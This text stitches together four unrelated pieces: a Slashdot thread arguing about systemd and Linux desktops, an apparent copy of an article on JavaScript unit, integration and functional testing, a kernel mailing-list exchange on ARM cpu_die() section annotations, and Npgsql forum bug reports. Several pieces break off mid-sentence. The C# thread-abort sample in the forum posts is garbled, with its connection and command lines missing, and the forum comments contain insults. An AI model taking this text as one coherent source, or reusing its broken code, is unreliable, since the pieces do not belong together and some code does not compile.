Since the provider type and service type are nominal variables, the main focus here will be on the large contingency table that can be formed by counting the number of services of a given type that are provided by all providers of a given type.
We will use these libraries:
import pandas as pd import numpy as np
Next we read in the data file. This is the payment data for one state. We can check the size of the data set and the variable names (
columns) to get a sense for what we have.
data = pd.read_csv("MI-subset.csv.gz", compression="gzip") print(data.shape) print(data.columns)
(339456, 27) Index([u'npi', u'nppes_provider_last_org_name', u'nppes_provider_first_name', u'nppes_provider_mi', u'nppes_credentials', u'nppes_provider_gender', u'nppes_entity_code', u'nppes_provider_street1', u'nppes_provider_street2', u'nppes_provider_city', u'nppes_provider_zip', u'nppes_provider_state', u'nppes_provider_country', u'provider_type', u'medicare_participation_indicator', u'place_of_service', u'hcpcs_code', u'hcpcs_description', u'line_srvc_cnt', u'bene_unique_cnt', u'bene_day_srvc_cnt', u'average_Medicare_allowed_amt', u'stdev_Medicare_allowed_amt', u'average_submitted_chrg_amt', u'stdev_submitted_chrg_amt', u'average_Medicare_payment_amt', u'stdev_Medicare_payment_amt'], dtype='object')
Here is a simple way to produce a contingency table, however as discussed further below, it is not quite right for our purposes:
tab = pd.crosstab(data["hcpcs_description"], data["provider_type"]) print tab.shape tab.iloc[0:3,0:3]
(2754, 83)
The difficulty is that each row in the data set reflects multiple instances in which a provider provided services to a patient (the exact number is given in the
line_srvc_cnt variable). The contingency table above counts the number of rows of the data set with a given combination of provider type and service type. We want to weight these counts by the
line_srvc_cnt variable. This is done by the code in the next cell:
tab = data.groupby(["hcpcs_description", "provider_type"]).agg({"line_srvc_cnt": np.sum}) tab.head()
What we have now is a contingency table represented as a Series object with a hierarchical index. To convert it to an actual table, we use
unstack, which takes the second level of the hierarchical row index and moves it to become the column index.
tab = tab.unstack() tab.head()
5 rows × 83 columns
A minor issue is that
unstack creates a hierarchical column index with the name
line_srvc_cnt as the first level for all columns. Since
line_srvc_cnt is the only variable being aggregated here, we can drop this and convert the hierarchical column index to a regular column index.
tab.columns = tab.columns.get_level_values(1) tab.head()
5 rows × 83 columns
Since some service type by provider type combinations don't appear in the data, they are counted as
NaN in the data file. Here we replace them with zero.
tab = tab.replace(np.nan, 0) tab.head()
5 rows × 83 columns
Now we're ready to explore the relationship between provider types and service types. First, we look at the number of distinct services that are performed at least once by providers of a given type.
sum_ptype = (tab > 0).sum(0) print(len(sum_ptype)) print(sum_ptype.head())
83 provider_type Addiction Medicine 33 All Other Suppliers 6 Allergy/Immunology 56 Ambulance Service Supplier 14 Ambulatory Surgical Center 212 dtype: int64
sum_ptype.plot(kind='hist') plt.xlabel("Number of services provided", size=15) plt.ylabel("Number of provider types", size=15)
<matplotlib.text.Text at 0x7f70913a9fd0>
Here are the provider types that perform the greatest number of different types of services.
print(sum_ptype[sum_ptype > 400])
provider_type Clinical Laboratory 549 Diagnostic Radiology 503 Family Practice 529 General Practice 409 General Surgery 401 Internal Medicine 715 Physician Assistant 488 dtype: int64
Here are the provider types that perform the fewest distinct service types.
print(sum_ptype[sum_ptype < 10])
provider_type All Other Suppliers 6 Anesthesiologist Assistants 8 Chiropractic 1 Geriatric Psychiatry 4 Licensed Clinical Social Worker 9 Multispecialty Clinic/Group Practice 4 Psychologist (billing independently) 1 Public Health Welfare Agency 2 Registered Dietician/Nutrition Professional 6 Speech Language Pathologist 7 Unknown Supplier/Provider 7 dtype: int64
Two of the provider types only provide one service type, let's see what that is:
for svc in sum_ptype[sum_ptype == 1].index: tab1 = tab.loc[:, svc].copy() tab1.sort(ascending=False) print(svc) print(tab1[0:3]) print
Chiropractic hcpcs_description Chiropractic manipulation 1206635 bls 0 Dx bronchoscope/wash 0 Name: Chiropractic, dtype: float64 Psychologist (billing independently) hcpcs_description Neuropsych tst by psych/phys 291 bls 0 Dx bronchoscope/lavage 0 Name: Psychologist (billing independently), dtype: float64
Now we perform the same analysis on the service types. For each service type, we count the number of distinct provider types who provided that service at least once.
sum_stype = (tab > 0).sum(1) print(sum_stype.head()) sum_stype.plot(kind='hist') plt.xlabel("Number of providers that provide service", size=15) plt.ylabel("Number of services", size=15)
hcpcs_description 3d render w/o postprocess 7 3d rendering w/postprocess 9 5% dextrose/normal saline 3 5% dextrose/water 5 ALS1-emergency 1 dtype: int64
<matplotlib.text.Text at 0x7f70913a90d0>
Here are the service types that are provided by many different provider types:
print(sum_stype[sum_stype > 30])
hcpcs_description Admin influenza virus vac 38 Behav chng smoking 3-10 min 32 Dexamethasone sodium phos 31 Echo guide for biopsy 32 Electrocardiogram complete 35 Extracranial study 32 Hospital discharge day 38 Initial hospital care 52 Initial observation care 31 MD certification HHA patient 34 Nursing fac care subseq 31 Office/outpatient visit est 61 Office/outpatient visit new 61 Routine venipuncture 42 Subsequent hospital care 53 Ther/proph/diag inj sc/im 40 Vitamin b12 injection 31 dtype: int64
Here are the service types that are provided by only a single provider type:
print(sum_stype[sum_stype == 1])
hcpcs_description ALS1-emergency 1 AbobotulinumtoxinA 1 Abrasion lesion single 1 Acetone assay 1 Acoustic refl threshold tst 1 Adenovirus assay w/optic 1 Admin ecg contrast agent 1 Ag detect nos eia mult 1 Alpha-1-antitrypsin pheno 1 Alpha-1-antitrypsin total 1 Alpha-fetoprotein l3 1 Als 1 1 Alteplase recombinant 1 Amifostine 1 Amikacin sulfate injection 1 ... X-ray exam of body section 1 X-ray exam of eye sockets 1 X-ray exam of jaw joint 1 X-ray exam of mastoids 1 X-ray exam of shoulders 1 X-ray guide gu dilation 1 X-ray head for orthodontia 1 X-ray stress view 1 X-rays bone survey complete 1 X-rays bone survey limited 1 Xm archive tissue molec anal 1 Xpose endoprosth brachial 1 Xray endovasc thor ao repr 1 als 2 1 bls 1 Length: 1034, dtype: int64
For the service types that are provided by only one type of provider, we can tabulate which provider it is that provides the service, and also display the number of times that the service was provided.
ii = (sum_stype == 1) tab1 = tab.loc[ii, :] usv = tab1.apply(np.argmax, 1) usv = pd.DataFrame(usv) usv["Num"] = tab1.apply(np.max, 1) usv = usv.rename(columns={0: "Service"}) print(usv)
Service Num hcpcs_description ALS1-emergency Ambulance Service Supplier 209322 AbobotulinumtoxinA Neurology 13541 Abrasion lesion single Otolaryngology 20 Acetone assay Clinical Laboratory 18 Acoustic refl threshold tst Audiologist (billing independently) 73 Adenovirus assay w/optic Optometry 18 Admin ecg contrast agent Cardiology 93 Ag detect nos eia mult Clinical Laboratory 213 Alpha-1-antitrypsin pheno Clinical Laboratory 50 Alpha-1-antitrypsin total Clinical Laboratory 280 Alpha-fetoprotein l3 Clinical Laboratory 47 Als 1 Ambulance Service Supplier 14697 Alteplase recombinant Hematology/Oncology 149 Amifostine Medical Oncology 28 Amikacin sulfate injection Urology 93 Amines vaginal fluid qual Obstetrics/Gynecology 13 Amputate leg at thigh Vascular Surgery 48 Amputation toe & metatarsal Vascular Surgery 50 Analysis skeletal muscle Pathology 17 Analyz neurostim brain addon Neurology 18 Analyze spine infus pump Anesthesiology 33 Anesth abdominal wall surg Anesthesiology 15 Anesth cabg w/o pump Anesthesiology 14 Anesth dx knee arthroscopy CRNA 22 Anesth ear surgery Anesthesiology 79 Anesth genitalia surgery Anesthesiology 24 Anesth kidney transplant Anesthesiology 14 Anesth kidney/ureter surg Anesthesiology 148 Anesth knee joint procedure Anesthesiology 13 Anesth lower leg surgery Anesthesiology 52 ... ... ... 
Verteporfin injection Ophthalmology 15600 Vinorelbine tartrate inj Hematology/Oncology 963 Virus antibody nos Clinical Laboratory 95 Virus inoculation shell via Clinical Laboratory 198 Virus inoculation tissue Clinical Laboratory 61 Visual audiometry (vra) Audiologist (billing independently) 19 Vit for membrane dissect Ophthalmology 17 Wcd device interrogate Cardiology 222 Wedge resect of lung initial Cardiac Surgery 12 West nile virus ab igm Clinical Laboratory 54 West nile virus antibody Clinical Laboratory 46 Wheelchair mngment training Physical Therapist 361 Withdrawal of arterial blood Pulmonary Disease 452 Wound closure by adhesive Emergency Medicine 51 Wound prep addl 100 cm Plastic and Reconstructive Surgery 24 X-ray exam of body section Oral Surgery (dentists only) 280 X-ray exam of eye sockets Diagnostic Radiology 15 X-ray exam of jaw joint Oral Surgery (dentists only) 165 X-ray exam of mastoids Internal Medicine 77 X-ray exam of shoulders Orthopedic Surgery 411 X-ray guide gu dilation Diagnostic Radiology 19 X-ray head for orthodontia Oral Surgery (dentists only) 31 X-ray stress view Orthopedic Surgery 90 X-rays bone survey complete Diagnostic Radiology 531 X-rays bone survey limited Diagnostic Radiology 122 Xm archive tissue molec anal Pathology 513 Xpose endoprosth brachial Urology 13 Xray endovasc thor ao repr Interventional Radiology 12 als 2 Ambulance Service Supplier 4210 bls Ambulance Service Supplier 196370 [1034 rows x 2 columns]
Produce sorted lists of the 10 most common procedures in Michigan and in Florida.
Produce sorted lists of the 10 most common provider types in Michigan and in Florida.
Compute the difference between the number of times that each service was provided in Michigan and in Florida. Then compute the average of the number of times that each service was provided in Michigan and in Florida. Make a scatterplot of the difference against the average. If you think it is more helpful, do the analysis and plotting on the log scale. | http://nbviewer.jupyter.org/urls/umich.box.com/shared/static/xhqqcz70rwcorbz4mgqtay6x7qwycpv5.ipynb | CC-MAIN-2018-05 | en | refinedweb |
As a developer, think of a 'with' statement as a try/finally pattern
def opening(filename):
f = open(filename)
try:
yield f
finally:
f.close()
This can now be viewed as:
with f = opening(filename):
#...read data from f...
This makes writing code easier to understand, and you don't have to always remember to delete the object reference using the del().
How does this apply to the Cursor object? Well natively, the Cursor object does not support 'with' statement use. To extend the Cursor, more specifically SearchCursor, first create a class:
class custom_cursor(object):
"""
Extension class of cursor to enable use of
with statement
"""
def __init__(self, cursor):
self.cursor = cursor
def __enter__(self):
return self.cursor
def __exit__(self, type, value, traceback):
del self.cursor
Now you have an object called custom_cursor that has the minimum required class properties of __enter__() and __exit__(). Notice that __exit__() performs that annoying del() to remove the schema locks on our data.
How do you use this? It's not hard at all. In this example, the function searchCursor() takes a feature class or table and a where clause (expression) and returns the results as an array of Row objects.
def searchCursor(fc,expression=""):
"""
Returns a collections of rows as an array of Row Objects
:param fc: Feature Class or Table
:param expression: Where Clause Statement (Optional)
:rtype Rows: Array of Rows
"""
rows = []
with custom_cursor(arcpy.SearchCursor(fc,expression)) as cur:
for row in cur:
rows.append(row)
return rows
The del() is taken care of automatically, and when the process is completed the __exit__() is called launching the del().
I got this idea from Sean Gillies Blog | https://anothergisblog.blogspot.com/2011/06/advanced-extending-search-cursor-object.html | CC-MAIN-2018-05 | en | refinedweb |
In this article I share some source code for a Java class that reads and writes to a remote socket.
I’m not going to describe this much today, but I put the source code for this Java together from a number of other sources on the internet. In short, it uses a Java Socket to connect to a port on a remote server, sends a command (a string) to that server to be executed, and then reads the output from the command that is executed. As a result, I assume that all information sent is text (no binary data).
How this Java socket client works
In the real world, this Java code works as a socket client, and calls a Ruby script I’ve installed on several remote servers. That Ruby script runs under xinetd on the remote Linux systems, executes the commands I pass to it, and returns the results to me.
Although I’ve hard-coded a number of variables in this Java class, you can modify it very easily to work for your needs when it comes to open and connect to remote sockets.
Without any further introduction, here is the source code for my Java
SocketClient class:
import java.io.*; import java.net.*; public class SocketClient { Socket sock; String server = "ftpserver"; int port = 5550; String filename = "/foo/bar/application1.log"; String command = "tail -50 " + filename + "\n"; public static void main(String[] args) { new SocketClient(); } public SocketClient() { openSocket(); try { // write to socket BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream())); wr.write(command); wr.flush(); // read from socket BufferedReader rd = new BufferedReader(new InputStreamReader(sock.getInputStream())); String str; while ((str = rd.readLine()) != null) { System.out.println(str); } rd.close(); } catch (IOException e) { System.err.println(e); } } private void openSocket() { // open a socket and connect with a timeout limit try { InetAddress addr = InetAddress.getByName(server); SocketAddress sockaddr = new InetSocketAddress(addr, port); sock = new Socket(); // this method will block for the defined number of milliseconds int timeout = 2000; sock.connect(sockaddr, timeout); } catch (UnknownHostException e) { e.printStackTrace(); } catch (SocketTimeoutException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } } }
I’m sorry I don’t have time today to explain this code, but as a quick summary, if you were looking for some Java code that shows how to write to a Java socket, and also read from a Java socket, I hope this is helpful.
Add new comment | http://alvinalexander.com/blog/post/java/java-class-writes-reads-remote-socket | CC-MAIN-2017-17 | en | refinedweb |
Shuttleworth Says Snappy Won't Replace .deb Linux Package Files In Ubuntu 15.10
darthcamaro writes: Mark Shuttleworth, BDFL of Ubuntu, is clearing the air about how Ubuntu will make use of .deb packages even in an era where it is moving to its own Snappy ('snaps') format of rapid updates. Fundamentally it's a chicken-and-egg issue. From the ServerWatch article: "'We build Snappy out of the built deb, so we can't build Snappy unless we first build the deb,' Shuttleworth said. Going forward, Shuttleworth said that Ubuntu users will still get access to an archive of .deb packages. That said, for users of a Snappy Ubuntu-based system, the apt-get command no longer applies. However, Shuttleworth explained that on a Snappy-based system there will be a container that contains all the deb packages. 'The nice thing about Snappy is that it's completely worry-free updates,' Shuttleworth said."
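The "worry-free updates" model can be sketched with a few commands. The subcommand names below are assumptions about the early Snappy CLI (later reworked as `snap`), not taken from the article, and the guard keeps the sketch a harmless no-op on machines without the tool:

```shell
# Hedged sketch: the snappy subcommands are assumptions, not from the article.
if command -v snappy >/dev/null 2>&1; then
    snappy list                    # installed snaps / system image versions
    snappy update                  # transactional update; previous image is kept
    snappy rollback ubuntu-core    # revert the system to the prior image
else
    # On a classic deb-based Ubuntu you would reach for apt-get instead.
    echo "snappy not installed; this system presumably uses apt-get/dpkg"
fi
```

The point is less the exact spelling of the subcommands than the model: apt mutates a shared filesystem package by package, while snaps are applied and rolled back as atomic units.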
why bother? (Score:5, Funny)
The functionality will be built in to the next version of systemd.
Re:why bother? (Score:5, Informative)
why is this modded troll?
Lennart the great mastermind has announced it on his blog:... [0pointer.net]
systemd will be a distribution (Score:2)
sooner or later.
now why would someone let guys who want to do that make their bootup system? it will have its own kernel soon enough too, and it's going to be forking time again for all the distros
Re: (Score:3, Insightful)
Wow. Now i really am starting to get why people hate this guy.
Re:why bother? (Score:4, Interesting)
Maybe you should actually read what he wrote before jumping on the hate bandwagon. He's absolutely right that for many years and applications traditional package systems fall down. That's not to say they aren't important. They are and will continue to be. But they have their limitations when it comes to fast moving software like LibreOffice on a nice stable slow moving distro like the LTS releases of Linux distros.
As a matter of fact Docker is really one attempt to solve this problem. CoreOS is based on this idea. ChromeOS also eschews packages entirely. Now Snappy.
And as experimental distros like Snappy try things, new utilities will have to be created to manage the images. This is what Poettering is talking about. In the meantime you're free to not use any of this. It's just a bunch of ideas, many of which happen to be really good, and natural extensions of the traditional package model. It's exciting stuff.
Re: (Score:2)
Sigh. That should have read, for many types of applications. Not many years. Google's swiping keyboard is pretty good but always makes a few mistakes.
Re:why bother? (Score:5, Insightful)
No they don't fall down. I've heard this claim and it's frankly not true (or rather, true in a very very limited set of cases).
For first party packages (distro provided) it's business as usual: Ubuntu seems to have no trouble tracking the latest Firefox builds, and there's a fresh deb available via apt-get update && apt-get upgrade in a very timely manner. Likewise there are fresh and stable LO packages available, depending on whether you want stability with timely security updates or bleeding edge.
So, demonstrably, fast moving packages are not a problem.
What about third party ones?
Basically it's the same. Add a PPA for the third party repo and it just works. Now, if the third party dev doesn't want to keep up to date with system libraries which may change, then they might choose to ship their own .so files. That has the downside of not tracking security updates, but since Linux package managers are the only system where arbitrary packages tend to get security updates to arbitrary libraries anyway, all that does is lower the performance to that of every other OS on the planet.
And some programs do this: they provide a third party .deb or PPA and dump files in /opt/foo, completely isolated from the system files in /usr. That works very well too.
One of the ways that packaging falls down traditionally is for multiple versions of the same package installed concurrently. Part of this is because some programs themselves are not built for that (e.g. expecting files in /etc), however most packages can be persuaded otherwise and there are in fact package managers that solve this problem.
The other way is if a program needs a complex system relying on multiple non-default configured packages to be set up. At that point, it's often easier to ship an entire system image.
However, doing system images for everything seems a tad wasteful.
The other thing that is happening is Zawinski's cascade of attention deficit teenagers. Yeah, I know packaging isn't perfect in general and deb is not perfect in a number of specific ways. But the people who want to dump everything and start afresh often seem to be quite unaware of the state of the art. The result is that the new systems are usually better in some ways, but inevitably worse in a number of ways that the author didn't think of but have been hammered out and working well for 20 years in other systems.
It's sad because to someone who's been around for a long time, software doesn't so much advance as take an awful lot of steps sideways. You get big fat brand new shiny systems which just plain do a bad job of previously solved problems.
This seems to be the same: many of the reasons for doing away with packages are flat-out wrong which strongly implies that the people replacing packages don't really understand packages properly and are therefore likely to make a bunch of new mistakes which have previously been solved perfectly fine. So even if they solve some problems (I have no doubt they will), they'll also unsolve a bunch.
Re: (Score:2)
Zawinski's cascade of attention deficit teenagers.
What a great description.
Re: (Score:2)
It's exciting stuff.
Is there really a part in there you consider exciting?
Re: (Score:2)
It's their yummy new almond flavoured product.
Re: Kool-Aid (Score:2)
Actually, I think what you're smelling are lolmonds, a newer relative of almonds.
Re: (Score:3, Funny)
Yes, how dare he develop software that people can use if they want to, the bastard.
Re: why bother? (Score:2)
You're assuming that "convenient for distro developers" translates into "valuable for users".
Moreover, you are ignoring that having it adopted as a dependency by things like GNOME largely tied most distros' hands. Dedicated non-GNOME distros are the only ones that made a choice. Any distro that wants to ship GNOME (an utterly unrelated product) did not choose systemd, as there was no choice available.
Re: (Score:2)
Either quite a few people love him or many distros adopted systemd on a technical basis. Which option worries you more?
:)
Re: (Score:3, Insightful)
It's a troll because it's another pointless slam at systemd, which is entirely off-topic here.
And Poettering isn't announcing anything on his blog, he's discussing improvements he and other systemd developers think could be made to the way GNU/Linux software is distributed. That would make his comments slightly more on-topic here, given snappy is (apparently) a change to the way GNU/Linux software is distributed, but his comments don't directly relate to snappy and appear to be vague concepts.
Nor is the
Re: why bother? (Score:3, Funny)
Pid eins is an anagram of iPenisd - now I understand...
Re: why bother? (Score:2)
Please use Type=forking in your unit file to get the behaviour you are expecting. It's covered in the man page.
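As a minimal sketch of that advice, a unit for a self-daemonizing service might look like the following; the service and binary names are hypothetical:

```ini
# /etc/systemd/system/mydaemon.service -- hypothetical example
[Unit]
Description=Example self-daemonizing service

[Service]
Type=forking
PIDFile=/run/mydaemon.pid
ExecStart=/usr/sbin/mydaemon --daemonize

[Install]
WantedBy=multi-user.target
```

With Type=forking, systemd treats the service as started once the process launched by ExecStart exits, which matches the double-fork behaviour traditional daemons exhibit; without it, systemd assumes the exiting parent means the service died.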
Re: (Score:3)
That's because the systemd manpage is about the main application. You want the systemd.service manpage.
Re: (Score:3)
You systemd haters are really hilarious.
Where else do you get to see somebody professing their love of the True Unix with Unix Philosophy, while repeatedly demonstrating ignorance of the very system they claim to love so much?
Allow me to impart a bit of education: some things have more than one manpage. For instance there's a manpage for both cron and crontab, and Perl has a whole bunch of them. Any competent admin would know this and wouldn't be mystified by systemd having separate manpages for commandlin
Re: (Score:2)
Hah, I knew it. You have no ability to hold a technical discussion.
If there's somebody not needed here, it's people who are ignorant and proud of it. If you actually want to contribute something useful, start coding. You discredit your own cause by posting this nonsense.
Re: (Score:2)
So, what you're saying is: you must first elaborately troubleshoot systemd just to get freaking stderr so you can troubleshoot what you actually care about? Truly a step forward!
Re: (Score:3)
Actually it is a step forward.
In sysv land, this is the difference between letting a service fork by itself and using start-stop-daemon. If you take the later approach, start-stop-daemon will perform the daemonization task on behalf of the service. In such a case if it ever prints on stderr, it will be lost in the void, since it's no longer connected to any terminal. systemd actually will ensure it goes into the log.
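On the systemd side, the capture behaviour described above corresponds to unit options that are typically the defaults but can be set explicitly; the unit and binary names here are hypothetical:

```ini
# Fragment of a hypothetical unit, e.g. /etc/systemd/system/mydaemon.service
[Service]
ExecStart=/usr/sbin/mydaemon
# Usually already the defaults (via DefaultStandardOutput=); shown explicitly:
StandardOutput=journal
StandardError=journal
```

So even a service running with no terminal attached gets its stderr recorded in the journal instead of vanishing into the void.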
Re: why bother? (Score:5, Informative)
What are you on about?
There's your stdout and stderr.
Re: (Score:2)
He doesn't know how to use journalctl and doesn't want to learn. He just wants to grep syslog the same way he has done for 30 years.
Re: (Score:3)
If something has worked fine for 30 years, why the fuck would you change it? Windows is the OS that pointlessly moves around all the administrative tools with every release; Linux is the OS that doesn't. That's not to say the OS can't change, but the new pieces must be backwards compatible with the basic system debugging techniques everyone knows. All it takes is software developers who don't actively hate their userbase and find joy in punishing them.
Re: why bother? (Score:4, Informative)
Actually no, it hasn't. sysv init has long been a pile of hacks on top of a pile of hacks. Ever tried to write a sysv service? It's really wonderful when a service refuses to come up because the pid file was left around for whatever reason, and some other program happens to be running under that pid.
For instance, the stderr thing this guy is complaining about was long a "feature" of sysv systems, where stderr could actually disappear into the void. Systemd actually makes things much better by ensuring stderr always gets saved.
As to why change logging, under systemd you can trivially ask for the messages for a particular service, or the messages from last boot, without having to figure out what to grep for, or having to set up syslogd beforehand to sort out your messages into separate files.
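Sketching those queries concretely (the unit name is illustrative, and the guard keeps this safe to run on machines without systemd):

```shell
if command -v journalctl >/dev/null 2>&1; then
    # Read-only queries; "|| true" keeps the sketch harmless where no journal exists.
    journalctl -u cron.service --no-pager -n 20 || true   # last 20 messages from one unit
    journalctl -b --no-pager -n 20 || true                # messages from the current boot
    journalctl -p err --no-pager -n 20 || true            # only error priority and worse
else
    echo "journalctl not available here"
fi
```

With a persistent on-disk journal, `-b -1` selects the previous boot instead of the current one.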
Re: (Score:2)
Systemd actually makes things much better by ensuring stderr always gets saved.
Your naive faith is cute. Sure, sysvinit is not wonderful. Regardless of the status of other init systems, SystemD is NOT the right answer. It is unreliable. It is taking over everything, which makes it a huge brittle obstacle that can be abused by those who control its underlying behavior. The guy writing it already has a terrible reputation for quality: Pulse Audio.
I could go on and on, but why. Some people are evangelists and there is no talking sense to them about the dangers of what is being proposed.
Re: (Score:2)
If something has worked fine for 30 years, why the fuck would you change it?
Good question. If something has worked fine for 30 years then no one would want to change it right? Certainly no one would be demanding the features? No one really wants easy commandline based syntax to extract exactly specific logs they are after.
Now back in the real world go ahead and install syslog-ng and dump all your crap into a text file like you're used to, and leave those of us who think that being a fucking regex guru should not be a pre-req to reading a log file alone.
Let me guess, you didn't even
Re: (Score:2)
That's not to say the OS can't change, but the new pieces must be backwards compatible
Sure. But the limitation here is not with systemd, but the fact that systemd has to communicate with syslog through a socket, and the socket has a limited buffer for storing queued messages. So if you need critical, timing-dependent log messages, you really need to use journalctl. If you refuse to use journalctl then you are shooting yourself in the foot and complaining that it hurts.
Re: (Score:2)
That's a stupid attitude to have in a field that moves as fast as computing. The internet didn't exist in anything resembling the current shape 30 years ago, just to give an example. You don't get to excuse ignorance of networking just because of that. I don't see how it's viable remaining a sysadmin without dealing with the fact that the hardware, software, and needs of the organization are constantly changing.
Nevertheless, all it takes is "ForwardToSyslog=yes" in journald.conf.
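For anyone looking for the exact stanza, the setting lives in the [Journal] section of journald.conf (the path below is the usual default location):

```ini
# /etc/systemd/journald.conf
[Journal]
ForwardToSyslog=yes
```

After editing, restart the journal daemon (e.g. `systemctl restart systemd-journald`) for the change to take effect.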
Re: (Score:2)
Well, if you understood anything about the project, you would know that rebuilding the init system and rebuilding the log system are two separate projects. There are independent rationales for each of them. You are free to disagree, of course, but they exist. And a counterargument of "it works for me" is less than useless in a discussion about whether the change is necessary. Given that there are a lot of people who do think a change is necessary, you should make a better attempt to understand why and make
Re: (Score:2)
You are all completely fucked, and clearly show your lack of maturity and competence.
What an odd statement.
Look AC, learn something about the way the linux kernel works, and then maybe you will be able to understand the problem. There can only be one logging daemon attached to
/dev/log. If it is journald it is journald, if it is syslog it is syslog. If you want both, one has to forward information to the other, and the amount and speed by which that forwarding can take place (via sockets) is limited by the kernel. So syslog missing messages that journald forwards, is an inherent limitation
Re: (Score:2)
Those desiring the change are the ones that need to explain why the change is needed/desirable in the first place.
They have, many times and in different places. If you didn't know that, maybe you should do some research.
I said that the arguments typically presented were weak and unreasonable.
So you do know that arguments and rationale have been made. Ok, how about a substantive counterargument then. Preferably one that actually addresses the arguments given and doesn't just dismiss them as "weak and unreasonable."
The ridiculously common command line that you wrote above fails on many/most distros that have chosen systemd as a default. These systems have no syslog at all.
Every distro that I know of (Red Hat, CentOS, Debian, Ubuntu, Arch) currently installs syslog alongside journald. If you don't have syslog installed, install it, and take it up wit
What happens with Launchpad PPAs? (Score:1, Interesting)
How? (Score:5, Insightful)
I don't think it was the PACKAGE that caused people to worry about an update.
Isn't that an issue with the code itself?
The great thing about
.deb packages was that the OFFICIAL ones underwent a lot of testing to try to catch problems BEFORE they were deployed. NOT because they were magical .deb packages.
Re: (Score:3)
Exactly - it is almost if they were trying to give a bad name to OS software.
There are very good reasons that Debs act like they do - and even M$ is now adopting the repository approach (but of course if the code isn't open, it can't prevent bad things from happening).
One could make the argument that all software should be its own blob - no dependencies because hard drives are now huge - but having 6 different versions running reduces the chance that someone else will be facing the same bug as you are - and m
Re:How? (Score:5, Insightful)
I've seen software that depends on bugs to function
Back in the 90s, I had to intentionally reproduce Microsoft bugs in my Windows drivers, or various apps that had never been run with non-Microsoft drivers would fall over...
But, yeah, let's make Linux do things the Windows way, so you have sixteen copies of different versions of zlib.dll spread across your disk, all with different security holes. Because you know it makes sense!
Re:How? (Score:5, Interesting)
The great thing about
.deb packages was that the OFFICIAL ones underwent a lot of testing to try to catch problems BEFORE they were deployed. NOT because they were magical .deb packages.
I think they are still standing on Debian's shoulders here, and their Snap files are being automatically created based on the
.debs. The main feature of a Snap file is it combines all the libraries in a single archive. All the dependencies, everything. It installs them locally, not for the whole system, kind of like an .app file on OSX.
If that seems like it would take a lot of disk space, Ubuntu is hoping disk deduplication will take care of that.
Re:How? (Score:4, Interesting)
All the dependencies, everything. It installs them locally, not for the whole system, kind of like an
.app file on OSX.
So.. they install things in Linux containers (or namespaces) and then call it "snappy"? So why not just link everything statically?
Anyway, I don't get it. You can do that already. but you still need to get those apps to communicate with outside world, which means leaky containers at best.
Furthermore, in case of heartbleed, it would mean EVERY single application that uses OpenSSL would have to get rebuilt instead of just getting fixed library and rebooting.
Re:How? (Score:4, Interesting)
I think there is definitely room in the Linux world for a self-contained App container. I don't think it's a good idea to make every package in your package management system self-contained, though.
Re: (Score:2)
Wheres the hate like systemD? (Score:2)
This also doesn't follow the Unix philosophy. Replaces a tool everyone is familiar with too. But I see no foaming at the mouths this time.
Re: (Score:3)
This also doesn't follow the Unix philosophy.
What part of the Unix philosophy doesn't it follow?
Replaces a tool everyone is familiar with too
It is a package manager, competing with plenty of other package managers out there. If you use this instead of Yum, it's not going to affect which GUI you use.
Re:Wheres the hate like systemD? (Score:5, Interesting)
As others have already pointed out, you are wrong for assuming this is like systemd, so I won't further beat that horse.
However, I think it's foolish for Shuttleworth to go down this path. It's inevitable that systemd will start to require that it gets its hooks into package management. Long story short, the way fixes are applied to systems is fundamentally broken. Whether it's because someone can't find a way to tell what needs to be restarted or can't impose a way to restart all services without downtime or can't find a way to apply changes to all containers or whatever half-thought-out problem is the excuse, it's broken. And the only fix will be to bundle it into the logic of systemd. Amongst other things, a package format will need to be mandated because supporting multiple formats is stupid or hard or out-of-scope
... you name it.
No one has been able to oppose the systemd maintainers except the kernel developers when it comes to user-space interfaces. Canonical hasn't been able to stand its ground against these developers in the past. I doubt they will in the future either. Shuttleworth is creating another failure.
Re: (Score:2)
ROFLMAO.... [0pointer.net]
I am dying inside. LOL Read your words then read that link then read your words again. You just can't make this shit up.
Re: (Score:2)
pray tell what is the standard package manager for "the unix way"?
There never was one
hence, no problem
Re: (Score:2)
pray tell what is the standard package manager for "the unix way"?
It's called 'make'.
Re: (Score:2)
what is the standard package manager for "the unix way"?
tar
Re: (Score:2)
nah, there is also cpio, ar and shar
Scary Words (Score:3)
"completely worry-free updates"
Those are very scary words when ever someone utters them because they seem to fail to comprehend the fact that testing is not perfect. I have real work to do. When they F*sk my system with an update that fails and it loses my data or prevents me from working, just once, it can be a huge disaster for me. Multiply that times all the users. Not an issue for the developer. Completely worry-free updates. Not.
Re:Scary Words (Score:4, Informative)
When they F*sk my system with an update that fails and it loses my data or prevents me from working, just once, it can be a huge disaster for me.
But isn't that exactly what these Snappy - packages are meant to address? All the current data for the application is backed up, the update is applied, if something goes wrong the system rolls back to the state the package and its data was before the update was attempted. At least that's what it says on Ubuntu's website, I don't know anything else about this thing.
Re: (Score:2)
That's the theory. But when they say "Worry Free" it worries me.
Re: (Score:2)
I don't blame you, to be honest. I don't really trust the idea, either, at least not without trying it myself and seeing how hard it is to break it.
Famous Last Words (Score:5, Interesting)
"The nice thing about Snappy is that it's completely worry-free updates"
Any time anyone says something is "completely worry-free", that's your cue to worry. Ask me how I know.
Re:Famous Last Words (Score:5, Funny)
Ask me how I know.
How do you know?
Re: (Score:2)
Because he's old.
Stop being so Dice-friendly PC! It's because he's a guy.
Re: (Score:2)
Because he's old.
Stop being so Dice-friendly PC! It's because he's a guy.
No, no...it's because I'm a guy AND because I'm old. Sheesh.
It will be gone in a few releases (Score:2)
Like upstart.
We're only thrilled to hear what Poettering will introduce next. Because Red Hat will adopt it and then everyone starts using it, because if it's Poetteringware, it's a quasi-standard, isn't it?
The Linux community is destroying itself. (Score:5, Insightful). Whatever small amount of convenience it may bring for the maintainers of Linux distros is more than offset by the many problems that systemd has caused the users of these distros. It doesn't matter if, say, the Debian maintainers' jobs are made easier if Debian itself suffers from reliability problems thanks to systemd that drive the most important Debian users over to FreeBSD.
But that's not the only example. We've seen the usability of Linux on desktops and workstations devastated by awful desktop environments like GNOME 3 and Unity. This mad rush to target "normal" users has been an utter disaster. No normal users have actually decided to use Linux due to these changes, but many long time Linux users have been forced to find alternatives.
If we go back 10 years, to 2005, I never would have expected Linux to be in such dire straits, and all due to problems that the Linux community has imposed on itself. It's really unbelievable how much harm the community has done to itself as of late.
Re:The Linux community is destroying itself. (Score:5, Interesting)
I'm not sure it's "the community" that's to blame as much as certain large entities in the community (*cough* Red Hat *cough*).
